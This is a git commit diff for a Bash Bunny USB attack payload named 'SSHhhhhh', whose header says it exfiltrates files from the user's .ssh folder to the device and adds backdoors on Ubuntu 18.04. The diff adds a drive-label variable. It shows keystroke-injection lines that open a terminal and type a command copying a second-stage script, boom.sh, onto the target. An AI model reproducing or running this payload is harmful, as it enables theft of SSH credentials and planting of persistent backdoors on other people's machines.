Update payload.txt
Added BashBunny drive label variable as suggested by @hak5peakspull/375/head
parent
83f8d9cb43
commit
1c2199298a
|
@ -1,12 +1,14 @@
|
||||||
# Title: SSHhhhhh
|
# Title: SSHhhhhh
|
||||||
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
|
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
|
||||||
# Author: WWVB
|
# Author: WWVB
|
||||||
# Props: Hak5Darren
|
# Props: Hak5Darren, hak5peaks
|
||||||
# Version: 1.0
|
# Version: 1.1
|
||||||
# Category: Exfiltration w/Persistence
|
# Category: Exfiltration w/Persistence
|
||||||
# Target: Linux Ubuntu 18.04 LTS
|
# Target: Linux Ubuntu 18.04 LTS
|
||||||
# Attackmodes: HID, Storage
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
DRIVE_LABEL="BashBunny"
|
||||||
|
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
@ -19,7 +21,7 @@ QUACK CTRL-ALT t
|
||||||
QUACK DELAY 100
|
QUACK DELAY 100
|
||||||
|
|
||||||
# Drop primary payload on the box
|
# Drop primary payload on the box
|
||||||
QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh .
|
QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 50
|
QUACK DELAY 50
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue